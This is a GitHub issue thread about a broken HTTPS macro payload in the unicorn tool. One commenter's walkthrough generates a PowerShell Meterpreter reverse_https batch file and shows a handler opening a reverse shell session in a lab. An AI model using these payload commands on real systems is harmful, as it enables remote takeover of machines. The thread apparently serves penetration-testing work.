### ISSUE TITLE
macro problem in https 

### ISSUE THREAD

**Issue by vasco2016** [trustedsec/unicorn#5]
Hi  
When i try to generate https macro it doesn’t work for me when i put code in xls or doc it doesn’t connect best case i got once "Unknown request to / with UA ... "

**Comment by trustedsec** [comment]
Will check into this tomorrow - thanks for the report

**Comment by all3g** [comment]
I've created [**psmsf**](https://github.com/all3g/psmsf) from **unicorn**, and it supports **windows/meterpreter/reverse_https**.

## Victim

Create Windows Batch Script for powershell mode

```
root@lab:~/psmsf# python psmsf.py --attacktype ps --payload windows/meterpreter/reverse_https --lhost 192.168.1.101 --lport 8443
[+] create msfconsole resource script
[+] create powershell shellcode command
root@lab:~/psmsf# ll 
total 32
-rw-r--r-- 1 root root  7743 Feb 20 09:23 powershell_hacking.bat
-rw-r--r-- 1 root root   175 Feb 20 09:23 powershell_msf.rc
-rw-r--r-- 1 root root 11435 Feb 20 09:00 psmsf.py
-rw-r--r-- 1 root root  5719 Feb 20 09:00 README.md
```

Upload **powershell_hacking.bat** to Windows 7 Lab, and run it.

## Attacker

```
msf exploit(handler) > jobs 

Jobs
====

  Id  Name                    Payload                            LPORT
  --  ----                    -------                            -----
  2   Exploit: multi/handler  windows/meterpreter/reverse_https  8443

msf exploit(handler) > 
[*] 192.168.1.101:49769 (UUID: 90ff204edf6c094a/x86=1/windows=1/2016-02-20T14:26:53Z) Staging Native payload ...
[*] Encoded stage with x86/shikata_ga_nai
[*] Meterpreter session 3 opened (192.168.1.101:8443 -> 192.168.1.101:49769) at 2016-02-20 22:26:56 +0800

msf exploit(handler) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > 
```

**Comment by all3g** [comment]
I've tried to born [**psmsf**](https://github.com/all3g/psmsf/) from your projects. Thanks.

**Comment by trustedsec** [comment]
I have fixed this in version 2.3, thanks for the report!
